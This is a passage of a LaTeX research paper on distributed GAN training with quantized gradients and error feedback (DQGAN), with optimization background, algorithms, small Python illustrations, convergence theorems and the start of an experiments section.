\theta^{*} \in \mathop{\arg\min}_{\theta\in\Theta} \mathcal{L}_G \left( \theta, \phi^{*} \right),
\end{equation}
\begin{equation}
\label{D3}
\phi^{*} \in \mathop{\arg\min}_{\phi\in\Phi} \mathcal{L}_D \left( \theta^{*}, \phi \right),
\end{equation}
where
\begin{equation}
\label{nonzerosumG}
\mathcal{L}_G \left( \theta, \phi \right) \overset{\text{def}}{=}
-\mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ D_{\phi} (G_{\theta}(\mathbf{z}) ) \right],
\end{equation}
\begin{equation}
\label{nonzerosumD}
\begin{aligned}
\mathcal{L}_D \left( \theta, \phi \right) \overset{\text{def}}{=}
- \mathbb{E}_{\mathbf{x} \sim p_{r}} \left[ D_{\phi}\left(\mathbf{x}\right) \right] + \mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ D_{\phi} ( G_{\theta}(\mathbf{z}) ) \right].
\end{aligned}
\end{equation}
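For concreteness, the empirical (mini-batch) versions of the objectives (\ref{nonzerosumG}) and (\ref{nonzerosumD}) can be written in a few lines; the toy one-dimensional $D$ and $G$ below are purely illustrative, not the networks used in the paper:

```python
import numpy as np

def g_loss(d, g, z):
    """Empirical estimate of L_G: the generator tries to raise D on fakes."""
    return -np.mean(d(g(z)))

def d_loss(d, x_real, g, z):
    """Empirical estimate of L_D: push D up on real data, down on fakes."""
    return -np.mean(d(x_real)) + np.mean(d(g(z)))

# Toy 1-D "networks": D(x) = x, G(z) = z + 1.
d = lambda x: x
g = lambda z: z + 1.0
x_real = np.array([1.0, 2.0])
z = np.array([0.0, 1.0])
print(g_loss(d, g, z))          # -> -1.5
print(d_loss(d, x_real, g, z))  # -> 0.0
```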
Gidel et al.~\cite{gidel2019a} define a \emph{stationary point} as a couple $(\theta^{*},\phi^{*})$ such that the directional derivatives of both
$\mathcal{L}_G \left( \theta, \phi^{*} \right)$ and $\mathcal{L}_D \left( \theta^{*}, \phi \right)$ are non-negative, i.e.,
\begin{equation}
\label{G5}
\nabla_{\theta} \mathcal{L}_G \left( \theta^{*}, \phi^{*} \right)^{T} \left( \theta-\theta^{*} \right) \geq 0,~\forall(\theta,\phi)\in\Theta\times\Phi;
\end{equation}
\begin{equation}
\label{D5}
\nabla_{\phi} \mathcal{L}_D \left( \theta^{*}, \phi^{*} \right)^{T} \left( \phi-\phi^{*} \right) \geq 0,~\forall(\theta,\phi)\in\Theta\times\Phi,
\end{equation}
which can be compactly formulated as
\begin{equation}
\label{VI}
\begin{aligned}
F \left( \mathbf{w}^{*} \right)^{T} & \left( \mathbf{w} - \mathbf{w}^{*} \right) \geq 0, ~ \forall \mathbf{w} \in \Omega,
\end{aligned}
\end{equation}
where $\mathbf{w} \overset{\text{def}}{=} \left[\theta,~\phi\right]^{T}$, $\mathbf{w}^{*} \overset{\text{def}}{=} \left[\theta^{*},~\phi^{*}\right]^{T}$, $\Omega\overset{\text{def}}{=}\Theta\times\Phi$ and $ F \left( \mathbf{w} \right) \overset{\text{def}}{=} \left[ \nabla_{\theta} \mathcal{L}_G \left( \theta, \phi \right),~\nabla_{\phi} \mathcal{L}_D \left( \theta, \phi \right) \right]^{T}$.
Many works have been devoted to GANs. For example, some focus on the loss design, such as WGAN~\cite{arjovsky2017wasserstein}, SN-GAN~\cite{miyato2018spectral}, and LS-GAN~\cite{qi2019loss}, while others focus on the network architecture design, such as CGAN~\cite{mirza2014conditional}, DCGAN~\cite{radford2016unsupervised}, and SAGAN~\cite{zhang2018self}. However, only a few works focus on the distributed training of GANs~\cite{liu2019decentralized}, which is our focus.
\subsection{Optimistic Mirror Descent}
\label{OMD}
The update scheme of the basic gradient method is given by
\begin{equation}
\label{gradient}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_t) \right],
\end{equation}
where $F(\mathbf{w}_t)$ is the gradient at $\mathbf{w}_t$, $P_{w} \left[\cdot\right]$ is the projection onto the constraint set $w$ (if constraints are present), and $\eta_t$ is the step size. The gradient descent algorithm is mainly designed for minimization problems, and it was proved to converge linearly under the strong monotonicity assumption on the operator $F(\mathbf{w}_t)$~\cite{chen1997Convergence}. However, the basic gradient descent algorithm may produce a sequence that drifts away and cycles without converging when dealing with certain min-max problems~\cite{arjovsky2017wasserstein}, such as the bilinear objective in~\cite{mertikopoulos2019optimistic}.
To solve the above problem, a practical approach is to average multiple iterates, which converges at a $O(\frac{1}{\sqrt{t}})$ rate~\cite{nedic2009subgradient}. Recently, the \emph{extragradient} method~\cite{nesterov2007dual} has been used for min-max problems due to its superior convergence rate of $O(\frac{1}{t})$. The idea of the extragradient method can be traced back to Korpelevich~\cite{korpelevich1976extragradient} and Nemirovski~\cite{nemirovski2004prox}. Its basic idea is to compute a lookahead gradient to guide the following step. The iterates of the extragradient method are given by
\begin{equation}
\label{extragradient_11}
\mathbf{w}_{t+\frac{1}{2}} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_t) \right],
\end{equation}
\begin{equation}
\label{extragradient_12}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right].
\end{equation}
However, we need to compute the gradient at both $\mathbf{w}_t$ and $\mathbf{w}_{t+\frac{1}{2}}$ in the above iterates. Chiang et al.~\cite{chiang2012online} suggested using the following iterates
\begin{equation}
\label{extragradient_21}
\mathbf{w}_{t+\frac{1}{2}} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}) \right],
\end{equation}
\begin{equation}
\label{extragradient_22}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right],
\end{equation}
in which we only need to compute the gradient at $\mathbf{w}_{t+\frac{1}{2}}$ and can reuse the gradient $F(\mathbf{w}_{t-\frac{1}{2}})$ computed in the last iteration.
Considering the unconstrained problem without projection, (\ref{extragradient_21}) and (\ref{extragradient_22}) reduce to
\begin{equation}
\label{extragradient_31}
\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}),
\end{equation}
\begin{equation}
\label{extragradient_32}
\mathbf{w}_{t+1} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}),
\end{equation}
and it is easy to see that this update is equivalent to the following one-line update, as in~\cite{daskalakis2018training}
\begin{equation}
\label{omd}
\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_{t-\frac{1}{2}} - 2\eta_t F(\mathbf{w}_{t-\frac{1}{2}})+\eta_t F(\mathbf{w}_{t-\frac{3}{2}}).
\end{equation}
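This equivalence is easy to verify numerically for a linear operator $F(\mathbf{w}) = A\mathbf{w}$ and a constant step size. The sketch below runs the two-step form (\ref{extragradient_31})--(\ref{extragradient_32}) and checks that its half-iterates satisfy the one-line recursion (\ref{omd}); the seeding conventions are ours:

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.standard_normal((4, 4))
F = lambda w: A @ w              # a linear operator, F(w) = A w
eta, T = 0.05, 30

# Two-step extragradient form: track w_t and the half-iterates w_{t+1/2}.
w = rng.standard_normal(4)
w_half_prev = w.copy()           # convention: w_{-1/2} = w_0
halves = []
for _ in range(T):
    w_half = w - eta * F(w_half_prev)   # lookahead step
    w = w - eta * F(w_half)             # update step
    halves.append(w_half)
    w_half_prev = w_half

# One-line form: h_{k+1} = h_k - 2*eta*F(h_k) + eta*F(h_{k-1}),
# seeded with the first two half-iterates of the run above.
h_prev, h = halves[0], halves[1]
for k in range(1, T - 1):
    h_prev, h = h, h - 2 * eta * F(h) + eta * F(h_prev)
    assert np.allclose(h, halves[k + 1])  # the two sequences coincide
```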
The optimistic mirror descent algorithm is shown in Algorithm~\ref{alg:OMD1}. To compute $\mathbf{w}_{t+1}$, it first generates an intermediate state $\mathbf{w}_{t+\frac{1}{2}}$ from $\mathbf{w}_t$ and the gradient $F(\mathbf{w}_{t-\frac{1}{2}})$ computed in the last iteration, and then computes $\mathbf{w}_{t+1}$ from $\mathbf{w}_t$ and the gradient at $\mathbf{w}_{t+\frac{1}{2}}$. At the end of the iteration, $F(\mathbf{w}_{t+\frac{1}{2}})$ is stored for the next iteration. The optimistic mirror descent algorithm was used for online convex optimization by Chiang et al.~\cite{chiang2012online} and for general online learning by Rakhlin and Sridharan~\cite{rakhlin2013optimization}. Mertikopoulos et al.~\cite{mertikopoulos2019optimistic} used the optimistic mirror descent algorithm for training generative adversarial networks on a single machine.
\begin{algorithm}[!h]
\caption{Optimistic Mirror Descent Algorithm}
\label{alg:OMD1}
\begin{algorithmic}[1]
\REQUIRE {step-size sequence $\eta_t>0$}
\FOR {$t = 0, 1, \ldots, T-1$}
\STATE {retrieve $F\left(\mathbf{w}_{t-\frac{1}{2}}\right)$}
\STATE {set $\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}) $}
\STATE {compute gradient $F\left(\mathbf{w}_{t+\frac{1}{2}}\right)$ at $\mathbf{w}_{t+\frac{1}{2}}$}
\STATE {set $\mathbf{w}_{t+1} = P_{w} \left[\mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right]$}
\STATE {store $F\left(\mathbf{w}_{t+\frac{1}{2}}\right)$}
\ENDFOR
\STATE {Return $\mathbf{w}_{T}$}
\end{algorithmic}
\end{algorithm}
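The divergence of plain gradient steps and the stabilizing effect of the optimistic update (\ref{omd}) can be seen on the bilinear toy problem $\min_{\theta} \max_{\phi} \theta\phi$, whose operator is $F(\theta,\phi) = (\phi, -\theta)$. The following sketch (not from the paper) compares the two:

```python
import numpy as np

F = lambda w: np.array([w[1], -w[0]])  # operator of min_theta max_phi theta*phi
eta, T = 0.1, 2000
w0 = np.array([1.0, 1.0])

# Plain simultaneous gradient descent-ascent: the iterates spiral outward.
w = w0.copy()
for _ in range(T):
    w = w - eta * F(w)
gda_norm = np.linalg.norm(w)

# Optimistic mirror descent (one-line form), reusing the previous gradient;
# we seed the stored gradient with F(w0).
g_prev = F(w0)
w = w0.copy()
for _ in range(T):
    g = F(w)
    w = w - 2 * eta * g + eta * g_prev
    g_prev = g
omd_norm = np.linalg.norm(w)

print(gda_norm > 1e3, omd_norm < 1e-2)  # -> True True
```

With $\eta = 0.1$ and 2000 iterations, the plain gradient iterates blow up by several orders of magnitude, while the optimistic iterates contract toward the equilibrium $(0,0)$.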
However, all of these works focus on the single-machine setting, whereas we propose a training algorithm for the distributed setting.
\subsection{Distributed Training}
Distributed centralized network and distributed decentralized network are two kinds of topologies used in distributed training.
In the distributed centralized network topology, each worker node can obtain the information of all other worker nodes. Centralized training systems have different implementations. There are two common models in the distributed centralized network topology, i.e., the parameter server model~\cite{li2014communication} and the AllReduce model~\cite{rabenseifner2004optimization, wang2019blink}. The difference between them is that each worker in the AllReduce model directly sends the gradient information to the other workers without a server.
In the distributed decentralized network topology, the computing nodes are usually organized into a graph, and the network topology does not ensure that each worker node can obtain the information of all other worker nodes. Worker nodes can only communicate with their neighbors. The network topology can be fixed or dynamic. Some parallel algorithms are designed for fixed topologies~\cite{jin2016scale, lian2017can, shen2018towards, tang2018d}. On the other hand, the network topology may change when network failures or power outages interrupt connections. Some methods have been proposed for this kind of dynamic network topology~\cite{nedic2014distributed, nedic2017achieving}.
Recently, Liu et al.~\cite{liu2019decentralized} proposed to train GANs with a decentralized network topology, but their method suffers from a large parameter-exchange overhead since the transmitted gradients are not compressed. In this paper, we mainly focus on the distributed training of GANs with the distributed centralized network topology.
\begin{figure}[!t]
\centering
\includegraphics[width=\columnwidth]{distplot.pdf}
\caption{Distributed training of GANs with Algorithm~\ref{alg:DQOSG} in the parameter-server model.}
\label{fig:framework}
\end{figure}
\subsection{Quantization}
Quantization is a promising technique to reduce the neural network model size by reducing the number of bits of the parameters. Early studies on quantization focus on CNNs and RNNs. For example, Courbariaux et al.~\cite{courbariaux2016binarized} proposed to use a single sign function with a scaling factor to binarize the weights and activations in neural networks, Rastegari et al.~\cite{rastegari2016xnornet} formulated quantization as an optimization problem in order to quantize CNNs to a binary neural network, and Zhou et al.~\cite{zhou2016dorefanet} proposed to quantize the weights, activations, and gradients. In distributed training, the expensive communication cost can be reduced by quantizing the transmitted gradients.
Denote the quantization function as $Q(\mathbf{v})$ where $\mathbf{v}\in\mathbb{R}^{d}$.
Generally speaking, existing gradient quantization techniques in distributed training can be divided into two categories, i.e., \textbf{biased quantization} ($\mathbb{E}[Q(\mathbf{v})]\neq \mathbf{v}$ for some $\mathbf{v}$) and \textbf{unbiased quantization} ($\mathbb{E}[Q(\mathbf{v})]= \mathbf{v}$ for all $\mathbf{v}$).
\textbf{Biased gradient quantization}: The sign function is a commonly-used biased quantization method~\cite{bernstein2018signsgd,seide20141,strom2015scalable}. Stich et al.~\cite{stich2018sparsified} proposed a top-$k$ quantization method which retains only the $k$ largest-magnitude elements of the vector and sets the others to zero.
\textbf{Unbiased gradient quantization}: Such methods usually use stochastically quantized gradients~\cite{wen2017terngrad,alistarh2017qsgd,wangni2018gradient}. For example, Alistarh et al.~\cite{alistarh2017qsgd} proposed a compression operator which can be formulated as
\begin{equation}
\label{qsgd}
Q(v_i) = sign(v_i) \cdot \|\mathbf{v}\|_{2} \cdot \xi_i(\mathbf{v},s),
\end{equation}
where $\xi_i(\mathbf{v},s)$ is defined as follows
\begin{equation}
\xi_i(\mathbf{v},s)=
\left\{
\begin{aligned}
&\frac{l}{s} &\text{with prob.} ~ 1-\left(\frac{|v_i|}{\|\mathbf{v}\|_2}\cdot s - l\right); \\
&\frac{l+1}{s} &\text{otherwise}.
\end{aligned}
\right.
\end{equation}
where $s$ is the number of quantization levels and $0 \leq l < s$ is an integer such that $|v_i|/\|\mathbf{v}\|_{2}\in[l/s,(l+1)/s]$. Hou et al.~\cite{hou2018analysis} replaced the $\|\mathbf{v}\|_{2}$ in the above method with $\|\mathbf{v}\|_{\infty}$.
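For concreteness, the following minimal NumPy sketch (illustrative only, not the original QSGD implementation) implements the stochastic quantizer in (\ref{qsgd}) and empirically checks the unbiasedness property $\mathbb{E}[Q(\mathbf{v})] = \mathbf{v}$:

```python
import numpy as np

def qsgd_quantize(v, s, rng):
    """Stochastic quantizer of Alistarh et al. (QSGD).

    Each coordinate of |v|/||v||_2 is rounded stochastically to one of
    the s+1 levels {0, 1/s, ..., 1} so that the result is unbiased.
    """
    norm = np.linalg.norm(v)
    if norm == 0.0:
        return np.zeros_like(v)
    ratio = np.abs(v) / norm           # in [0, 1]
    l = np.floor(ratio * s)            # lower level index
    p_up = ratio * s - l               # prob. of rounding up to (l+1)/s
    xi = (l + (rng.random(v.shape) < p_up)) / s
    return np.sign(v) * norm * xi

# Empirical unbiasedness check: the sample mean over many independent
# draws of Q(v) should approach v itself.
rng = np.random.default_rng(0)
v = rng.standard_normal(10)
est = np.mean([qsgd_quantize(v, s=4, rng=rng) for _ in range(20000)], axis=0)
print(np.max(np.abs(est - v)) < 0.05)   # True, consistent with E[Q(v)] = v
```

Replacing $\|\mathbf{v}\|_{2}$ by $\|\mathbf{v}\|_{\infty}$ in the `norm` line gives the variant of Hou et al.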
\section{The Proposed Method}
\label{sec:method}
\subsection{{DQGAN} Algorithm}
We now consider an extension of the algorithm to the setting of a \emph{stochastic} operator, i.e., we no longer have access to the exact gradient but only to an unbiased stochastic estimate of it.
Suppose we have $M$ machines.
On machine $m$ at the $t$-th iteration, we sample a mini-batch $\xi_{t}^{(m)} = \left( \xi_{t,1}^{(m)}, \xi_{t,2}^{(m)}, \cdots, \xi_{t,B}^{(m)} \right)$, where $B$ is the mini-batch size; the same mini-batch size $B$ is used on all $M$ machines.
We use $F(\mathbf{w}_{t}^{(m)};\xi_{t,b}^{(m)})$~($1\leq b \leq B$) and $F(\mathbf{w}_{t}^{(m)})$ to denote the \emph{stochastic gradient} and the \emph{gradient}, respectively.
On machine $m$ at the $t$-th iteration, the \emph{mini-batch gradient} is defined as $F(\mathbf{w}_{t}^{(m)};\xi_{t}^{(m)}) = \frac{1}{B} \sum_{b=1}^{B} F(\mathbf{w}_{t}^{(m)};\xi_{t,b}^{(m)})$.
To reduce the size of the transmitted gradients in distributed training, we introduce a quantization function $Q(\cdot)$ to compress the gradients. In this paper, we consider a general $\delta$-approximate compressor for our method
\begin{defn}
A quantization operator $Q$ is said to be a $\delta$-approximate compressor for $\delta \in (0,1]$ if
\begin{equation}
\| Q\left(F(\mathbf{w})\right)-F(\mathbf{w}) \|^{2} \leq (1-\delta) \|F(\mathbf{w})\|^{2} \quad \text{for all} ~ \mathbf{w} \in \Omega.
\end{equation}
\label{definQ}
\end{defn}
\vskip -0.2in
Before sending its gradient to the central server, each worker needs to quantize it, which gives our algorithm a small communication overhead.
In addition, our algorithm is applicable to any gradient compression method that satisfies the general $\delta$-approximate compressor condition.
In general, quantized gradients lose some accuracy and may cause the algorithm to fail to converge. In this paper, we design an error compensation operation to solve this problem: the error made by the compression operator is incorporated into the next step to compensate for the gradients. Recently, Stich et al.~\cite{stich2018sparsified} conducted a theoretical analysis of error feedback in the strongly convex case, and Karimireddy et al.~\cite{karimireddy2019error} further extended the convergence results to the non-convex and weakly convex cases.
These error-feedback operations were designed for minimization problems. Here, in order to solve a min-max problem, the error-feedback operation must be designed more carefully: in each iteration, we compensate the error caused by gradient quantization twice.
The proposed method, named {Distributed Quantized Generative Adversarial Networks (DQGAN)}, is summarized in Algorithm~\ref{alg:DQOSG}. Its procedure is illustrated with the parameter-server model~\cite{li2014communication} in Figure~\ref{fig:framework}.
There are $M$ workers participating in the model training.
First, $\mathbf{w}_{0}$ is initialized and pushed to all workers, and the local error variable $\mathbf{e}^{(m)}_{0}$ is set to $0$ for $m\in\{1,\ldots,M\}$.
In each iteration, the state $\mathbf{w}_{t-1}$ is first updated on the $m$-th worker to obtain the intermediate state $\mathbf{w}_{t-\frac{1}{2}}^{(m)}$. The $m$-th worker then computes the gradient $F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)})$, adds the error compensation $\mathbf{e}^{(m)}_{t-1}$ to obtain $\mathbf{p}_{t}^{(m)}$, quantizes it to $\hat{\mathbf{p}}_{t}^{(m)}$, and transmits the quantized vector to the server. The error $\mathbf{e}_{t}^{(m)}$ is recorded as the difference between $\mathbf{p}_{t}^{(m)}$ and $\hat{\mathbf{p}}_{t}^{(m)}$. The server averages all quantized gradients and pushes the average back to all workers, which use it to update $\mathbf{w}_{t-1}$ to the new parameter $\mathbf{w}_{t}$.
\begin{algorithm}[!h]
\caption{The Algorithm of {DQGAN}}
\begin{algorithmic}[1]
\REQUIRE {step-size $\eta>0$; quantization function $Q\left(\cdot\right)$ that is a $\delta$-approximate compressor.}
\STATE Initialize $\mathbf{w}_0$ and push it to all workers, set $\mathbf{w}^{(m)}_{-\frac{1}{2}} = \mathbf{w}_0$ and $\mathbf{e}^{(m)}_0=0$ for $1 \leq m \leq M$.
\FOR {$t = 1, 2, \ldots, T$}
\STATE {\textbf{on} worker m : $( m \in \{1, 2, \cdots, M\} )$}
\STATE {\quad set $\mathbf{w}_{t-\frac{1}{2}}^{(m)} = \mathbf{w}_{t-1} - \left[ \eta F(\mathbf{w}_{t-\frac{3}{2}}^{(m)};\xi_{t-1}^{(m)}) + \mathbf{e}^{(m)}_{t-1} \right]$}
\STATE {\quad compute gradient $F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)})$}
\STATE {\quad set $\mathbf{p}_{t}^{(m)} = \eta F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}) + \mathbf{e}^{(m)}_{t-1} $}
\STATE {\quad set $\hat{\mathbf{p}}_{t}^{(m)} = Q\left( \mathbf{p}_{t}^{(m)} \right)$} and push it to the server
\STATE {\quad set $\mathbf{e}_{t}^{(m)} = \mathbf{p}_{t}^{(m)} - \hat{\mathbf{p}}_{t}^{(m)}$}
\STATE {\textbf{on} server:}
\STATE {\quad \textbf{pull} $\hat{\mathbf{p}}_{t}^{(m)}$ \textbf{from} each worker}
\STATE {\quad set $\hat{\mathbf{q}}_{t} = \frac{1}{M} \left[ \sum_{m=1}^{M} \hat{\mathbf{p}}_{t}^{(m)} \right]$}
\STATE {\quad \textbf{push} $\hat{\mathbf{q}}_{t}$ \textbf{to} each worker}
\STATE {\textbf{on} worker m : $( m \in \{1, 2, \cdots, M\} )$}
\STATE {\quad set $\mathbf{w}_{t} = \mathbf{w}_{t-1} - \hat{\mathbf{q}}_{t}$}
\ENDFOR
\STATE {Return $\mathbf{w}_{T}$}
\end{algorithmic}
\label{alg:DQOSG}
\end{algorithm}
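To make the update order of Algorithm~\ref{alg:DQOSG} concrete, the following minimal NumPy sketch (an illustrative assumption, not the paper's implementation: the operator, compressor, and step size are chosen for simplicity) runs the worker/server steps with a scaled-sign compressor, which is a $\delta$-approximate compressor with $\delta = 1/d$, on the deterministic toy saddle problem $\min_x \max_y \, xy$ with operator $F(x,y) = (y, -x)$:

```python
import numpy as np

def F(w):
    # Operator of the toy saddle problem min_x max_y x*y:
    # F(w) = (dL/dx, -dL/dy) = (y, -x); its unique saddle point is (0, 0).
    return np.array([w[1], -w[0]])

def Q(v):
    # Scaled-sign compressor: only sign bits plus one scalar are sent.
    # It satisfies the delta-approximate condition with delta = 1/d.
    return (np.linalg.norm(v, 1) / v.size) * np.sign(v)

M, eta, T = 4, 0.1, 2000
w = np.array([1.0, -1.0])               # w_0, shared by all workers
e = [np.zeros(2) for _ in range(M)]     # error memory e_0^(m)
g_prev = [F(w) for _ in range(M)]       # gradient at w_{-1/2} = w_0

for _ in range(T):
    p_hat = []
    for m in range(M):
        w_half = w - (eta * g_prev[m] + e[m])   # extrapolation step
        g = F(w_half)                           # (mini-batch) gradient
        p = eta * g + e[m]                      # error compensation
        p_hat.append(Q(p))                      # quantize and push
        e[m] = p - p_hat[m]                     # residual for next step
        g_prev[m] = g
    q_hat = np.mean(p_hat, axis=0)              # server averages
    w = w - q_hat                               # workers update

print(np.linalg.norm(w) < 1e-2)   # True: iterates approach the saddle
```

In a real run, $F$ would be a noisy mini-batch estimate and the averaging step would be an all-reduce over the compressed messages; the error-feedback bookkeeping is unchanged.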
\subsection{Coding Strategy}
The quantization function plays an important role in our method. In this paper, we adopt the general $\delta$-approximate compressor condition in order to cover a variety of quantization methods. In this subsection, we show that several commonly-used quantization methods are $\delta$-approximate compressors.
According to the definition of the $k$-contraction operator~\cite{stich2018sparsified}, we can verify the following theorem
\begin{thm}
The $k$-contraction operator~\cite{stich2018sparsified} is a $\delta$-approximate compressor with $\delta=\frac{k}{d}$, where $d$ is the dimension of the input and $k\in\{1,\ldots,d\}$ is a parameter.
\label{deltaOne}
\end{thm}
Moreover, we can prove the following theorem
\begin{thm}
The quantization methods in~\cite{alistarh2017qsgd} and~\cite{hou2018analysis} are $\delta$-approximate compressors.
\label{deltaTwo}
\end{thm}
Therefore, a variety of quantization methods can be used for our method.
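As a quick numerical sanity check of Theorem~\ref{deltaOne}, the sketch below (a hypothetical test harness, not part of the paper's code) verifies on random vectors that the top-$k$ operator satisfies $\| Q(\mathbf{v})-\mathbf{v} \|^{2} \leq (1-k/d) \|\mathbf{v}\|^{2}$:

```python
import numpy as np

def top_k(v, k):
    # Keep the k largest-magnitude entries of v, zero out the rest.
    out = np.zeros_like(v)
    idx = np.argsort(np.abs(v))[-k:]
    out[idx] = v[idx]
    return out

# Verify ||Q(v) - v||^2 <= (1 - k/d) ||v||^2 over many random draws.
rng = np.random.default_rng(2)
d, k = 50, 10
worst = 0.0
for _ in range(1000):
    v = rng.standard_normal(d)
    ratio = np.linalg.norm(top_k(v, k) - v) ** 2 / np.linalg.norm(v) ** 2
    worst = max(worst, ratio)
print(worst <= 1 - k / d)   # True
```

The bound holds because the dropped $d-k$ entries are the smallest in magnitude, so their average squared value cannot exceed the overall average.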
\subsection{Convergence Analysis}
Throughout the paper, we make the following assumption
\begin{ass}[Lipschitz Continuous]
\begin{enumerate}
\item $F$ is $L$-Lipschitz continuous, i.e.,
$\| F(\mathbf{w}_{1}) - F(\mathbf{w}_{2}) \| \leq L \| \mathbf{w}_{1} - \mathbf{w}_{2} \|$ for all $\mathbf{w}_{1}, \mathbf{w}_{2}$.
\item $\| F(\mathbf{w}) \| \leq G$ for all $\mathbf{w}$.
\end{enumerate}
\label{assum1}
\end{ass}
\begin{ass}[Unbiased and Bounded Variance]
For $\forall \mathbf{w}_{t-\frac{1}{2}}^{(m)}$, we have $\mathbb{E}\left[F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t,b}^{(m)})\right] = F(\mathbf{w}_{t-\frac{1}{2}}^{(m)})$ and $\mathbb{E}\|F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t,b}^{(m)}) - F(\mathbf{w}_{t-\frac{1}{2}}^{(m)})\|^2 \leq \sigma^2$ , where $1 \leq b \leq B$.
\label{assum2}
\end{ass}
\begin{ass}[Pseudomonotonicity]
The operator $F$ is pseudomonotone, i.e.,
$$\left\langle F(\mathbf{w}_{2}), \mathbf{w}_{1} - \mathbf{w}_{2} \right\rangle \geq 0 \;\Rightarrow\; \left\langle F(\mathbf{w}_{1}) , \mathbf{w}_{1} - \mathbf{w}_{2} \right\rangle \geq 0 \quad \text{for all} ~ \mathbf{w}_{1},\mathbf{w}_{2}.$$
\label{assum3}
\end{ass}
Now, we give a key Lemma, which shows that the residual errors maintained in Algorithm~\ref{alg:DQOSG} do not accumulate too much.
\begin{lem}
At any iteration $t$ of Algorithm~\ref{alg:DQOSG}, the expected squared norm of the averaged error $\frac{1}{M}\sum_{m=1}^{M} \mathbf{e}_{t}^{(m)}$ is bounded:
\begin{equation}
\mathbb{E} \left[ \| \frac{1}{M} \sum_{m=1}^{M} \mathbf{e}^{(m)}_{t} \|^2 \right]
\leq \frac{8\eta^2(1-\delta)(G^{2}+\frac{\sigma^2}{B})}{\delta^2}
\end{equation}
If $\delta = 1$, then $\|\mathbf{e}_{t}^{(m)}\|=0$ for $1 \leq m \leq M$ and the error is zero as expected.
\label{errorBounded}
\end{lem}
Finally, based on above assumptions and lemma, we are on the position to describe the convergence rate of Algorithm~\ref{alg:DQOSG}.
\begin{thm}
By picking the $\eta \leq \min \{ \frac{1}{\sqrt{BM}}, \frac{1}{6\sqrt{2}L} \}$ in Algorithm~\ref{alg:DQOSG}, we have
\begin{equation}
\begin{aligned}
\frac{1}{T} \sum_{t=1}^{T} \mathbb{E} & \left[ \| \frac{1}{M}\sum_{m=1}^{M} F\left(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}\right) \|^2 \right]
\leq \frac{4 \| \tilde{\mathbf{w}}_{0} - \mathbf{w}^* \|^2}{\eta^{2} T} + \frac{1728~ L^2 \sigma^2}{B^2M^2} \\
& \quad + \frac{3456~ L^2 G^2 (M-1)}{BM^2} + \frac{9216~ L^2 (1-\delta)(G^{2}+\frac{\sigma^2}{B})(M-1)}{\delta^2 BM^2} + \frac{48~ \sigma^2}{BM}
\end{aligned}
\label{eq:converg}
\end{equation}
\label{converge}
\end{thm}
Theorem~\ref{converge} establishes a non-asymptotic convergence rate and a linear speedup in theory.
We seek an $\epsilon$-first-order stationary point, i.e.,
\begin{equation}
\mathbb{E} \left[ \| \frac{1}{M}\sum_{m=1}^{M} F\left(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}\right) \|^2 \right] \leq \epsilon^{2}
\end{equation}
By taking $M=\mathcal{O}(\epsilon^{-2})$ and $T=\mathcal{O}(\epsilon^{-8})$,
we can guarantee that Algorithm~\ref{alg:DQOSG} reaches an $\epsilon$-first-order stationary point.
\section{Experiments}
\label{sec:experiments}
\begin{figure}[t]
\centerline{\includegraphics[width=\columnwidth]{Cifar10_is_fid.pdf}}
\caption{The Inception Score and Fr{\'e}chet Inception Distance values of three methods on the CIFAR10 dataset.}
\label{fig:results_cifa10}
\vspace{-0.4cm}
\end{figure}
\begin{figure}[t]
\centerline{\includegraphics[width=\columnwidth]{CelebA_is_fid.pdf}}
\caption{The Inception Score and Fr{\'e}chet Inception Distance values of three methods on the CelebA dataset.}
\label{fig:results_celeba}
\vspace{-0.4cm}
\end{figure}
\begin{figure}[t]
\centerline{\includegraphics[width=0.8\columnwidth]{speedup.pdf}}
\caption{The speedup of our method on the CIFAR10 and CelebA datasets (left and right respectively).}
\label{fig:speedup}
\vspace{-0.4cm}
\end{figure}
In this section, we present the experimental results on
real-life datasets. We used PyTorch~\cite{paszke2019pytorch} as the underlying deep learning framework
and Nvidia NCCL~\cite{nccl} as the communication mechanism.
We used the following two real-life benchmark datasets for the remaining experiments.
The \textbf{CIFAR-10} dataset~\cite{krizhevsky2009learning} contains 60{,}000 $32\times32$ images in 10 classes: airplane, automobile, bird, cat, deer, dog, frog, horse, ship and truck.
The \textbf{CelebA} dataset~\cite{liu2015faceattributes} is a large-scale face attributes dataset with more than 200K celebrity images, each with 40 attribute annotations.
We compared our method with
{Centralized Parallel Optimistic Adam (CPOAdam)}, which is our method without quantization and error feedback,
and Centralized Parallel Optimistic Adam with Gradient Quantization (CPOAdam-GQ),
for training generative adversarial networks with the loss in (\ref{loss_gan1}) and
the deep convolutional generative adversarial network (DCGAN) architecture~\cite{radford2016unsupervised}.
We implemented full-precision (float32) baseline models and set the number of bits for our method to $8$.
We used the compressor in~\cite{hou2018analysis} for our method.
Learning rates and hyperparameters in these methods were chosen by an inspection of grid search results
so as to enable a fair comparison of these methods.
We use the Inception Score~\cite{salimans2016improved} and the Fr{\'e}chet Inception Distance~\cite{dowson1982frechet}
